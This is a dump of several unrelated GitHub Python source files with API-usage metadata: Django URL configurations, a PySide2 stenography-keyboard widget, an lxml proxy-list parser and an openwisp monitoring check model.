"call"}, {"api_name": "numpy.zeros", "line_number": 137, "usage_type": "call"}, {"api_name": "kernel.GenotypeDType", "line_number": 138, "usage_type": "name"}, {"api_name": "kernel.breed_population", "line_number": 143, "usage_type": "call"}, {"api_name": "kernel.MUTATION_RATE", "line_number": 150, "usage_type": "name"}, {"api_name": "kernel.NUM_GENES", "line_number": 150, "usage_type": "name"}, {"api_name": "numpy.count_nonzero", "line_number": 151, "usage_type": "call"}, {"api_name": "kernel.MUTATION_RATE", "line_number": 155, "usage_type": "name"}, {"api_name": "kernel.NUM_GENES", "line_number": 155, "usage_type": "name"}, {"api_name": "kernel.CELLS_PER_STAMP", "line_number": 155, "usage_type": "name"}, {"api_name": "numpy.count_nonzero", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 173, "usage_type": "call"}, {"api_name": "kernel.GenotypeDType", "line_number": 174, "usage_type": "name"}, {"api_name": "kernel.breed_population", "line_number": 195, "usage_type": "call"}, {"api_name": "kernel.CROSSOVER_RATE", "line_number": 207, "usage_type": "name"}, {"api_name": "kernel.NUM_GENES", "line_number": 209, "usage_type": "name"}, {"api_name": "numpy.count_nonzero", "line_number": 210, "usage_type": "call"}, {"api_name": "kernel.NUM_GENES", "line_number": 213, "usage_type": "name"}, {"api_name": "kernel.CELLS_PER_STAMP", "line_number": 213, "usage_type": "name"}, {"api_name": "numpy.count_nonzero", "line_number": 214, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 219, "usage_type": "call"}]} +{"seq_id": "26232257119", "text": "from django.urls import path\n\nfrom .views import (\n TaskListAPIView,\n TaskCreateAPIView,\n TaskDestroyAPIView,\n TaskRetrieveAPIView,\n TaskUpdateAPIView,\n )\n\napp_name = 'tasks-api'\n\nurlpatterns = [\n path('', TaskListAPIView.as_view(), name=\"tasks-list\"),\n path('create/', TaskCreateAPIView.as_view(), name=\"task-create\"),\n path('<int:pk>/detail/', TaskRetrieveAPIView.as_view(), name=\"task-detail\"),\n path('<int:pk>/update/', TaskUpdateAPIView.as_view(), name=\"task-update\"),\n path('<int:pk>/delete/', TaskDestroyAPIView.as_view(), name=\"task-delete\"),\n]\n", "repo_name": "Roman673/django-task-list", "sub_path": "tasks/api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 586, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "views.TaskListAPIView.as_view", "line_number": 14, "usage_type": "call"}, {"api_name": "views.TaskListAPIView", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "views.TaskCreateAPIView.as_view", "line_number": 15, "usage_type": "call"}, {"api_name": "views.TaskCreateAPIView", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "views.TaskRetrieveAPIView.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "views.TaskRetrieveAPIView", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "views.TaskUpdateAPIView.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "views.TaskUpdateAPIView", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": 
"views.TaskDestroyAPIView.as_view", "line_number": 18, "usage_type": "call"}, {"api_name": "views.TaskDestroyAPIView", "line_number": 18, "usage_type": "name"}]} +{"seq_id": "27143177204", "text": "import sys\nfrom PySide2 import QtCore, QtWidgets, QtGui\n\n\n# dimensions given in pixels\nKEY_WIDTH = 11\nKEY_HEIGHT = 11\nKEY_BOARDER = 1 # 2\nKEY_SPACING = 1 # 0\nFONT_SIZE = 8\n\n\nclass KeyPath(QtGui.QPainterPath):\n\n def __init__(self, start_point=QtCore.QPointF(0.0, 0.0), size=QtCore.QSize(KEY_WIDTH, KEY_HEIGHT)):\n super().__init__(start_point)\n\n self.start_point = start_point\n self.size = size\n self.rect = QtCore.QRectF(self.start_point, self.size)\n\n self.moveTo(start_point)\n self.addRoundedRect(self.rect, 2.0, 2.0)\n\n\nclass Key(QtWidgets.QWidget):\n\n def __init__(self, letter):\n super().__init__()\n\n self.letter = letter\n self.size_ = QtCore.QSize(KEY_WIDTH, KEY_HEIGHT)\n\n self.color = QtCore.Qt.lightGray\n\n def minimumSizeHint(self):\n return self.size_ + QtCore.QSize(KEY_BOARDER, KEY_BOARDER)\n\n def sizeHint(self):\n return self.size_ + QtCore.QSize(KEY_BOARDER, KEY_BOARDER)\n\n def set_color(self, color):\n self.color = color\n self.update()\n\n # TODO implement proper color management using QPalette\n # def mousePressEvent(self, event):\n # self.setBackgroundRole(QtGui.QPalette.Base)\n # if self.color == QtCore.Qt.gray:\n # self.set_color(QtGui.QColor(122, 163, 39))\n # else:\n # self.set_color(QtCore.Qt.gray)\n\n def paintEvent(self, event):\n painter = QtGui.QPainter(self)\n painter.setRenderHint(QtGui.QPainter.HighQualityAntialiasing)\n\n pen = QtGui.QPen()\n pen.setColor(QtCore.Qt.black)\n pen.setWidth(KEY_BOARDER)\n pen.setStyle(QtCore.Qt.SolidLine)\n pen.setCapStyle(QtCore.Qt.RoundCap)\n pen.setJoinStyle(QtCore.Qt.RoundJoin)\n\n painter.setPen(pen)\n\n brush = QtGui.QBrush()\n brush.setStyle(QtCore.Qt.SolidPattern)\n brush.setColor(self.color)\n\n painter.setBrush(brush)\n\n path = KeyPath(QtCore.QPointF(0.0, 0.0), self.size_)\n painter.drawPath(path)\n\n font = painter.font()\n font.setPixelSize(FONT_SIZE)\n font.setWeight(QtGui.QFont.Medium)\n painter.setFont(font)\n\n rect = path.boundingRect()\n painter.drawText(rect, QtCore.Qt.AlignCenter, self.letter)\n\n\nclass TallKey(Key):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n # self.size_ = QtCore.QSize(10, 22)\n w = KEY_WIDTH\n h = 2*KEY_HEIGHT + KEY_BOARDER + KEY_SPACING\n self.size_ = QtCore.QSize(w, h)\n\n\nclass WideKey(Key):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n # self.size_ = QtCore.QSize(120, 10)\n w = 10*KEY_WIDTH + 9*KEY_SPACING + 10*KEY_BOARDER\n h = KEY_HEIGHT\n self.size_ = QtCore.QSize(w, h)\n\n\nclass StenoBoard(QtWidgets.QWidget):\n\n def __init__(self):\n super().__init__()\n\n QtWidgets.QShortcut(QtGui.QKeySequence(\"Escape\"), self, self.close)\n self.resize(500, 500)\n\n self.number_bar = WideKey(\"# \") # align symbol with *-key\n\n self.s_left = TallKey(\"S\")\n self.t_left = Key(\"T\")\n self.p_left = Key(\"P\")\n self.h = Key(\"H\")\n\n self.k = Key(\"K\")\n self.w = Key(\"W\")\n self.r_left = Key(\"R\")\n\n self.a = Key(\"A\")\n self.o = Key(\"O\")\n\n self.star = TallKey(\"*\")\n\n self.e = Key(\"E\")\n self.u = Key(\"U\")\n\n self.f = Key(\"F\")\n self.p_right = Key(\"P\")\n self.l = Key(\"L\")\n self.t_right = Key(\"T\")\n self.d = Key(\"D\")\n\n self.r_right = Key(\"R\")\n self.b = Key(\"B\")\n self.g = Key(\"G\")\n self.s_right = Key(\"S\")\n self.z = Key(\"Z\")\n\n # left\n self.left_top_layout = 
QtWidgets.QHBoxLayout()\n self.left_top_layout.setContentsMargins(0, 0, 0, 0)\n self.left_top_layout.setSpacing(KEY_SPACING)\n self.left_top_layout.addWidget(self.t_left)\n self.left_top_layout.addWidget(self.p_left)\n self.left_top_layout.addWidget(self.h)\n\n self.left_bottom_layout = QtWidgets.QHBoxLayout()\n self.left_bottom_layout.setContentsMargins(0, 0, 0, 0)\n self.left_bottom_layout.setSpacing(KEY_SPACING)\n self.left_bottom_layout.addWidget(self.k)\n self.left_bottom_layout.addWidget(self.w)\n self.left_bottom_layout.addWidget(self.r_left)\n\n self.left_stack_layout = QtWidgets.QVBoxLayout()\n self.left_stack_layout.setContentsMargins(0, 0, 0, 0)\n self.left_stack_layout.setSpacing(KEY_SPACING)\n self.left_stack_layout.addLayout(self.left_top_layout)\n self.left_stack_layout.addLayout(self.left_bottom_layout)\n self.left_stack_layout.addWidget(QtWidgets.QWidget(), stretch=1)\n\n self.left_outer_layout = QtWidgets.QHBoxLayout()\n self.left_outer_layout.setContentsMargins(0, 0, 0, 0)\n self.left_outer_layout.setSpacing(KEY_SPACING)\n self.left_outer_layout.addWidget(self.s_left)\n self.left_outer_layout.addLayout(self.left_stack_layout)\n self.left_outer_layout.addWidget(QtWidgets.QWidget(), stretch=1)\n\n # right\n self.right_top_layout = QtWidgets.QHBoxLayout()\n self.right_top_layout.setContentsMargins(0, 0, 0, 0)\n self.right_top_layout.setSpacing(KEY_SPACING)\n self.right_top_layout.addWidget(self.f)\n self.right_top_layout.addWidget(self.p_right)\n self.right_top_layout.addWidget(self.l)\n self.right_top_layout.addWidget(self.t_right)\n self.right_top_layout.addWidget(self.d)\n\n self.right_bottom_layout = QtWidgets.QHBoxLayout()\n self.right_bottom_layout.setContentsMargins(0, 0, 0, 0)\n self.right_bottom_layout.setSpacing(KEY_SPACING)\n self.right_bottom_layout.addWidget(self.r_right)\n self.right_bottom_layout.addWidget(self.b)\n self.right_bottom_layout.addWidget(self.g)\n self.right_bottom_layout.addWidget(self.s_right)\n self.right_bottom_layout.addWidget(self.z)\n\n self.right_layout = QtWidgets.QVBoxLayout()\n self.right_layout.setContentsMargins(0, 0, 0, 0)\n self.right_layout.setSpacing(KEY_SPACING)\n self.right_layout.addLayout(self.right_top_layout)\n self.right_layout.addLayout(self.right_bottom_layout)\n self.right_layout.addWidget(QtWidgets.QWidget(), stretch=1)\n\n # home\n self.home_layout = QtWidgets.QHBoxLayout()\n self.home_layout.setContentsMargins(0, 0, 0, 0)\n self.home_layout.setSpacing(KEY_SPACING)\n self.home_layout.addLayout(self.left_outer_layout)\n self.home_layout.addWidget(self.star)\n self.home_layout.addLayout(self.right_layout)\n self.home_layout.addWidget(QtWidgets.QWidget(), stretch=1)\n\n # thumb\n self.thumb_layout = QtWidgets.QHBoxLayout()\n self.thumb_layout.setContentsMargins(0, 0, 0, 0)\n self.thumb_layout.setSpacing(KEY_SPACING)\n left_offset = 2*KEY_WIDTH + 2*KEY_BOARDER + 2*KEY_SPACING\n self.thumb_layout.addSpacerItem(QtWidgets.QSpacerItem(left_offset, 0))\n self.thumb_layout.addWidget(self.a)\n self.thumb_layout.addWidget(self.o)\n middle_offset = KEY_WIDTH + KEY_BOARDER + 2*KEY_SPACING\n self.thumb_layout.addSpacerItem(QtWidgets.QSpacerItem(middle_offset, 0))\n self.thumb_layout.addWidget(self.e)\n self.thumb_layout.addWidget(self.u)\n self.thumb_layout.addWidget(QtWidgets.QWidget(), stretch=1)\n\n # board\n self.board_layout = QtWidgets.QVBoxLayout()\n self.board_layout.setContentsMargins(0, 0, 0, 0)\n self.board_layout.setSpacing(KEY_SPACING)\n self.board_layout.addWidget(self.number_bar)\n 
self.board_layout.addLayout(self.home_layout)\n self.board_layout.addLayout(self.thumb_layout)\n self.board_layout.addWidget(QtWidgets.QWidget(), stretch=1)\n\n self.setLayout(self.board_layout)\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n\n steno_board = StenoBoard()\n steno_board.show()\n\n sys.exit(app.exec_())\n", "repo_name": "excalamus/t_rex_typer", "sub_path": "t_rex_typer/steno_board.py", "file_name": "steno_board.py", "file_ext": "py", "file_size_in_byte": 8129, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PySide2.QtGui.QPainterPath", "line_number": 13, "usage_type": "attribute"}, {"api_name": "PySide2.QtGui", "line_number": 13, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QPointF", "line_number": 15, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 15, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 15, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QRectF", "line_number": 20, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 20, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 26, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 26, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 32, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 32, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 34, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 34, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 37, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 37, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 40, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 40, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QPainter", "line_number": 55, "usage_type": "call"}, {"api_name": "PySide2.QtGui", "line_number": 55, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QPainter", "line_number": 56, "usage_type": "attribute"}, {"api_name": "PySide2.QtGui", "line_number": 56, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QPen", "line_number": 58, "usage_type": "call"}, {"api_name": "PySide2.QtGui", "line_number": 58, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 59, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 59, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 61, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 61, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 62, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 62, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 63, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 63, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QBrush", "line_number": 67, "usage_type": "call"}, {"api_name": "PySide2.QtGui", "line_number": 67, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 68, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 68, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QPointF", "line_number": 73, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 73, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QFont", "line_number": 78, "usage_type": 
"attribute"}, {"api_name": "PySide2.QtGui", "line_number": 78, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 82, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 82, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 92, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 92, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QSize", "line_number": 102, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 102, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 105, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 105, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QShortcut", "line_number": 110, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 110, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QKeySequence", "line_number": 110, "usage_type": "call"}, {"api_name": "PySide2.QtGui", "line_number": 110, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 145, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 145, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 152, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 152, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QVBoxLayout", "line_number": 159, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 159, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 164, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 164, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 166, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 166, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 171, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 171, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 174, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 174, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 183, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 183, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QVBoxLayout", "line_number": 192, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 192, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 197, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 197, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 200, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 200, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 206, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 206, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 209, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 209, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QSpacerItem", "line_number": 213, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 213, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QSpacerItem", "line_number": 217, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 217, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", 
"line_number": 220, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 220, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QVBoxLayout", "line_number": 223, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 223, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 229, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 229, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 235, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 235, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 235, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 240, "usage_type": "call"}]} +{"seq_id": "18811246700", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.front, name='blogs-frontship'),\n path('Home/', views.home, name='blogs-home'),\n # path('frontship/', views.front, name='blogs-frontship'),\n path('register/', views.add, name='blogs-register'),\n path('submit/', views.add, name='blogs-register'),\n path('dashboard/', views.dashboard, name='blogs-dashboard'),\n]\n\n\n'''\n[{% for dess in des %} '{{ dess.orgin }}', {% endfor %}]\n'''", "repo_name": "ahamed2408/SupplyChains", "sub_path": "f_projects/blogs/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "12296230789", "text": "# coding=utf8\n\nimport re\nimport base64\n\nfrom lxml import etree\n\nfrom config import config\nfrom Logger.Logger import logging\n\nclass HtmlParser(object):\n\n def __init__(self):\n self.ips = []\n\n def parse(self, response, parser):\n return self.XpathPraser(response, parser)\n\n def XpathPraser(self, response, parser):\n iplist = []\n root = etree.HTML(response)\n proxys = root.xpath(parser['pattern'])\n for proxy in proxys:\n try:\n ip = proxy.xpath(parser['position']['ip'])[0].text.replace(' ', '')\n port = proxy.xpath(parser['position']['port'])[0].text.replace(' ', '')\n location = proxy.xpath(parser['position']['location'])[0].text.replace(' ', '')\n iptype = proxy.xpath(parser['position']['type'])[0].text.replace(' ', '')\n if parser['position']['protocol']:\n protocol = proxy.xpath(parser['position']['protocol'])[0].text.replace(' ', '')\n else:\n protocol = ''\n\n logging.info(\"{0}:{1}\\t{2}\\t{3}\\t{4}\".format(ip, port, location, iptype, protocol))\n # print \"###\", ip, ':', port, location, iptype, \"###\"\n proxy = {\n \"ip\": ip,\n \"port\": port,\n \"location\": location,\n \"iptype\": iptype,\n \"protocol\": protocol,\n }\n except Exception as e:\n logging.info(\"Exception: {0}\".format(e))\n # print e\n continue\n iplist.append(proxy)\n return iplist\n\n\nhtml_parser = HtmlParser()\n", "repo_name": "pigjj/IPProxyPool", "sub_path": "IPProxySpider/proxy/IPSpider/HtmlParser.py", "file_name": "HtmlParser.py", "file_ext": "py", "file_size_in_byte": 1676, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", 
"api": [{"api_name": "lxml.etree.HTML", "line_number": 21, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 21, "usage_type": "name"}, {"api_name": "Logger.Logger.logging.info", "line_number": 34, "usage_type": "call"}, {"api_name": "Logger.Logger.logging", "line_number": 34, "usage_type": "name"}, {"api_name": "Logger.Logger.logging.info", "line_number": 44, "usage_type": "call"}, {"api_name": "Logger.Logger.logging", "line_number": 44, "usage_type": "name"}]} +{"seq_id": "29209885545", "text": "from collections import OrderedDict\n\nfrom django.contrib.contenttypes.fields import GenericForeignKey\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db import models\nfrom django.utils.functional import cached_property\nfrom django.utils.module_loading import import_string\nfrom django.utils.translation import gettext_lazy as _\nfrom jsonfield import JSONField\n\nfrom openwisp_monitoring.check import settings as app_settings\nfrom openwisp_monitoring.check.tasks import (\n auto_create_config_check,\n auto_create_iperf3_check,\n auto_create_ping,\n)\nfrom openwisp_utils.base import TimeStampedEditableModel\n\nfrom ...utils import transaction_on_commit\n\n\nclass AbstractCheck(TimeStampedEditableModel):\n name = models.CharField(max_length=64, db_index=True)\n is_active = models.BooleanField(\n _('active'),\n default=True,\n db_index=True,\n help_text=_(\n 'whether the check should be run, related metrics collected and alerts sent'\n ),\n )\n description = models.TextField(blank=True, help_text=_('Notes'))\n content_type = models.ForeignKey(\n ContentType, on_delete=models.CASCADE, null=True, blank=True\n )\n object_id = models.CharField(max_length=36, db_index=True, blank=True)\n content_object = GenericForeignKey('content_type', 'object_id')\n check_type = models.CharField(\n _('check type'),\n choices=app_settings.CHECK_CLASSES,\n db_index=True,\n max_length=128,\n )\n params = JSONField(\n _('parameters'),\n default=dict,\n blank=True,\n help_text=_('parameters needed to perform the check'),\n load_kwargs={'object_pairs_hook': OrderedDict},\n dump_kwargs={'indent': 4},\n )\n\n class Meta:\n abstract = True\n unique_together = ('name', 'object_id', 'content_type')\n\n permissions = (\n ('add_check_inline', 'Can add check inline'),\n ('change_check_inline', 'Can change check inline'),\n ('delete_check_inline', 'Can delete check inline'),\n ('view_check_inline', 'Can view check inline'),\n )\n\n def __str__(self):\n if not self.object_id or not self.content_type:\n return self.name\n obj = self.content_object\n model_name = obj.__class__.__name__\n return '{0} ({1}: {2})'.format(self.name, model_name, obj)\n\n def clean(self):\n self.check_instance.validate()\n\n def full_clean(self, *args, **kwargs):\n # The name of the check will be the same as the\n # 'check_type' chosen by the user when the\n # name field is empty (useful for CheckInline)\n if not self.name:\n self.name = self.get_check_type_display()\n return super().full_clean(*args, **kwargs)\n\n @cached_property\n def check_class(self):\n \"\"\"\n returns check class\n \"\"\"\n return import_string(self.check_type)\n\n @cached_property\n def check_instance(self):\n \"\"\"\n returns check class instance\n \"\"\"\n check_class = self.check_class\n return check_class(check=self, params=self.params)\n\n def perform_check(self, store=True):\n \"\"\"\n initiates check instance and calls its check method\n \"\"\"\n if (\n hasattr(self.content_object, 'organization_id')\n and 
self.content_object.organization.is_active is False\n ):\n return\n return self.check_instance.check(store=True)\n\n def perform_check_delayed(self, duration=0):\n from ..tasks import perform_check\n\n perform_check.apply_async(args=[self.id], countdown=duration)\n\n\ndef auto_ping_receiver(sender, instance, created, **kwargs):\n \"\"\"\n Implements OPENWISP_MONITORING_AUTO_PING\n The creation step is executed in the background\n \"\"\"\n # we need to skip this otherwise this task will be executed\n # every time the configuration is requested via checksum\n if not created:\n return\n transaction_on_commit(\n lambda: auto_create_ping.delay(\n model=sender.__name__.lower(),\n app_label=sender._meta.app_label,\n object_id=str(instance.pk),\n )\n )\n\n\ndef auto_config_check_receiver(sender, instance, created, **kwargs):\n \"\"\"\n Implements OPENWISP_MONITORING_AUTO_DEVICE_CONFIG_CHECK\n The creation step is executed in the background\n \"\"\"\n # we need to skip this otherwise this task will be executed\n # every time the configuration is requested via checksum\n if not created:\n return\n transaction_on_commit(\n lambda: auto_create_config_check.delay(\n model=sender.__name__.lower(),\n app_label=sender._meta.app_label,\n object_id=str(instance.pk),\n )\n )\n\n\ndef auto_iperf3_check_receiver(sender, instance, created, **kwargs):\n \"\"\"\n Implements OPENWISP_MONITORING_AUTO_IPERF3\n The creation step is executed in the background\n \"\"\"\n # we need to skip this otherwise this task will be executed\n # every time the configuration is requested via checksum\n if not created:\n return\n transaction_on_commit(\n lambda: auto_create_iperf3_check.delay(\n model=sender.__name__.lower(),\n app_label=sender._meta.app_label,\n object_id=str(instance.pk),\n )\n )\n", "repo_name": "openwisp/openwisp-monitoring", "sub_path": "openwisp_monitoring/check/base/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 5350, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 131, "dataset": "github-code", "pt": "52", "api": [{"api_name": "openwisp_utils.base.TimeStampedEditableModel", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 25, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models.TextField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.models.ForeignKey", "line_number": 33, "usage_type": "call"}, {"api_name": "django.contrib.contenttypes.models.ContentType", "line_number": 34, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 34, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 36, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 36, "usage_type": "name"}, 
{"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 37, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 38, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 39, "usage_type": "call"}, {"api_name": "openwisp_monitoring.check.settings.CHECK_CLASSES", "line_number": 40, "usage_type": "attribute"}, {"api_name": "openwisp_monitoring.check.settings", "line_number": 40, "usage_type": "name"}, {"api_name": "jsonfield.JSONField", "line_number": 44, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 45, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 48, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 49, "usage_type": "name"}, {"api_name": "django.utils.module_loading.import_string", "line_number": 87, "usage_type": "call"}, {"api_name": "django.utils.functional.cached_property", "line_number": 82, "usage_type": "name"}, {"api_name": "django.utils.functional.cached_property", "line_number": 89, "usage_type": "name"}, {"api_name": "tasks.perform_check.apply_async", "line_number": 111, "usage_type": "call"}, {"api_name": "tasks.perform_check", "line_number": 111, "usage_type": "name"}, {"api_name": "utils.transaction_on_commit", "line_number": 123, "usage_type": "call"}, {"api_name": "openwisp_monitoring.check.tasks.auto_create_ping.delay", "line_number": 124, "usage_type": "call"}, {"api_name": "openwisp_monitoring.check.tasks.auto_create_ping", "line_number": 124, "usage_type": "name"}, {"api_name": "utils.transaction_on_commit", "line_number": 141, "usage_type": "call"}, {"api_name": "openwisp_monitoring.check.tasks.auto_create_config_check.delay", "line_number": 142, "usage_type": "call"}, {"api_name": "openwisp_monitoring.check.tasks.auto_create_config_check", "line_number": 142, "usage_type": "name"}, {"api_name": "utils.transaction_on_commit", "line_number": 159, "usage_type": "call"}, {"api_name": "openwisp_monitoring.check.tasks.auto_create_iperf3_check.delay", "line_number": 160, "usage_type": "call"}, {"api_name": "openwisp_monitoring.check.tasks.auto_create_iperf3_check", "line_number": 160, "usage_type": "name"}]} +{"seq_id": "31620117475", "text": "\"\"\"\nCreated by Amey on 11/07/2020\n\"\"\"\n\nimport 